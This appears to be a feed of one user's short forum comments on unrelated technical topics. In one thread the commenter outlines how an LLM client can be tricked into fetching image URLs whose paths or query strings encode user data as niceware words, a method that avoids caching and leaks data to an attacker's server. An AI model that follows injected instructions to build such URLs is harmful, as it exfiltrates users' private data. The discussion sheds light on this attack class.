Often times this language is used to drum up funding for exactly these types of things.
Often times this language is used to drum up funding for exactly these types of things.
If you’re still posting on Reddit or Twitter, and it’s not for a niche community, please don’t come here.
Or, https://www.firefly-iii.org/, a full self-hosted system similar to Mint.
Oooo healthy online discourse. Where’s my popcorn…
This post isn’t about email open rates, it’s about data exfiltration. But for email speficially, show me major providers that prefetch by default.
If by prefetch you mean the server grabs the images ahead of time vs the client, this does not happen, at least on amy major modern platform that I know of. They will cache once a client has opened, but unique URLs per recipient are how they track the open rates.
Server or client, every supposed prefetch would be unique. If I trick an LLM client into grabbing:
site.com/random-words-of-data/image.gif
Then:
site.com/more-random-data/image.gif
Those are two separate images to the cache engine. As the data refreshes, the URL changes, forcing a new grab each time.
For email, marketers do this by using a unique image URL for every recipient.
But the path changes with every new data element. It’s never the same, so every “prefetch” is a whole new image in the system’s eyes.
This wouldn’t help, would it? How would you prefetch and cache:
site.com/base64u-to-niceware-word-array/image.gif
? It would look like a normal image URL in any article, but actually represent data.
Note: “niceware” is a way to convert binary or text data into a set of words like “cow-heart-running-something-etc”.
Sort of, but not really.
In basic terms, if an LLM’s training data has:
Bob is 21 years old.
Bob is 32 years old.
Then when it tries to predict the next word after “Bob is”, it would pick 21 or 32 assuming somehow the weights were perfectly equal between the two (weight being based on how many times it occurred in training data around other words).
If the user has memories turned on, it’s sort of like providing additional training data. So if in previous prompts you said:
I am Bob.
I am 43 years old.
The system will parse that and use it with a higher weight, sort of like custom training the model. This is not exactly how it works, because training is much more in-depth, it’s more of a layer on top of the training, but hopefully gives you an idea.
The catch is it’s still not reliable, as the other words in your prompt may still lead the LLM to predict a word from it’s original training data. Tuning the weights is not a one-size fits all endeavor. What works for:
How old am I?
May not work for:
What age is Bob?
For instance.
Haven’t read details, but the classic way is to have a system visit: site.com/badimage.gif?data=abcd
Note: That s is also how things like email open rates are tracked, and how marketers grab info using JavaScript to craft image URLs.
When you boot up for a meeting and have to wait 10 minutes for updates to finish. Too much like Windows.
Two things to change if you switch from Ubuntu to Debian:
If only they’d change the dumb way date time entry works for the calendar it would be near perfect.
Using Evolution for desktop but about to give Thunderbird another shot I think.
Usually on my desktop connected to vscode-server, but when I’m remote, yes.
I use a Samsung Tab 9. Then supplement with a server running VSCode-server and other things. I would prefer Linux, and sometimes use TermuxX11, but it was the best I could come up with.
Really? Have you set up services with docker before? I found it super easy compared to other systems. Curious what specifically threw you as I barely did anything except spin it up.
Don’t even need tabs with screen
Big fan, but if you haven’t tried Obtainium as a client, give it a go. Can manage installs from F-Droid, GitHub releases, and more.